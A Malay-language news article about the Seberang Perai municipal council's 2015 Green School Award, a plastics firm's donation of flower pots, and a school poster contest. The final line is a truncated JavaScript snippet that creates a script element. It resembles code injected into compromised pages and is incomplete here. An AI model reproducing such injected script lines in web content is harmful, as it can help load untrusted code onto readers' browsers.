MPSP sasar 220 sekolah sertai Anugerah Sekolah Hijau 2015

Oleh : ZAINULFAQAR YAACOB

PADANG LALANG – Majlis Perbandaran Seberang Perai (MPSP) mensasarkan pertandingan Anugerah Sekolah Hijau 2015 akan disertai 50 sekolah menengah, sekolah rendah (100) serta pra sekolah (70) membabitkan ketiga-tiga Daerah Seberang Perai.

Untuk itu, Yang di-Pertua MPSP, Dato’ Maimunah Mohd. Sharif berkata, 36 sekolah yang pertama kali menyertai Anugerah Sekolah Hijau 2014 masingmasing akan diberi 15 pokok telah siap ditanam da lam pasu, sumbangan Kilang Guppy Plastic Industries Sendirian Berhad (Guppy).

Tidak cukup dengan itu, katanya lagi, juri pertandingan pada tahun ini akan menambah 10 lagi pasu bunga kepada sekolah-sekolah yang dikenalpasti berjaya melaksanakan program kebersihan dan penghijauan dengan baik.

“Jumlah keseluruhan adalah sebanyak 220 sekolah, sasaran kita (MPSP) untuk tahun ini (2015),” kata Maimunah di perkarangan Bangunan MPSP Jalan Betik di sini baru-baru ini.

Dua Ahli Majlis MPSP, Mohd. Sharmizan Mohamad Nor dan Nur Shazreen Mohd. Jilani, Pengurus Besar Guppy, Tan Teik Huat, dan Ketua Jabatan Lanskap MPSP, Shaqhroni Jamaluddin turut menyertai Majlis Penyerahan Pasu Bunga Kepada Sekolah-Sekolah Seluruh Seberang Perai berkenaan.

Difahamkan, Anugerah Sekolah Hijau yang diperkenalkan sejak tahun 2010 antara lain bertujuan untuk menyuburkan budaya amalan hijau di sekolah serta dalam kehidupan seharian generasi masa depan Seberang Perai.

Direkodkan, sebanyak 30 sekolah menyertai Anugerah Sekolah Hijau pada tahun 2010, diikuti, 36 (2011), 53 (2012), 84 (2013) dan 106 (2014).

Maimunah memberitahu, Guppy sejak tahun 2013 lagi menaja pasu bunga untuk program tersebut. Syarikat terbabit, tambah beliau, menaja 540 pasu bunga pada majlis anugerah kali ini dengan MPSP menyumbang pokok bunga.

Dalam perkembangan lain, Maimunah mengumumkan bahawa Pertandingan Melukis Poster “Kempen Makan Sampai Habis” menawarkan hadiah lumayan setinggi RM2,000 kepada sekolah dan RM500 kepada murid yang menjuarai saingan berkaitan.

Katanya, poster-poster peserta akan dipaparkan untuk proses mengundi daripada kalangan pembayar cukai mulai 1 Februari hingga 28 Februari ini, sebelum 10 poster terbaik bagi setiap kategori akan dikemukakan pada saingan peringkat negeri.

var d=document;var s=d.createElement(‘script’);